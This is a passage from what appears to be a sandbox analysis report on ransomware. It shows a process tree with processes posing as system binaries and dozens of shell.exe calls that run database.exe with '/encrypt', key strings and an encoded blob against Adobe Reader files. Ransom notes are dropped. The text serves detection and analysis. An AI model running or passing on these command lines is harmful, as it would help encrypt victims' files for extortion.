                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\xk.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\xk.exe
                                                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:7736
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\IExplorer.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\IExplorer.exe
                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:7744
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
                                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:7784
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:7800
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7656
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
                                                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:7916
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7972
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 576
                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                                                                                                                    PID:7648
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:7612
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:4860
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:4976
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4788
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1172
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6136
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3300
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4220
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5720
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4772
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6508
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4424
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3228
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2384
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                                                                                                                                                                                                                                                                          PID:2728
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
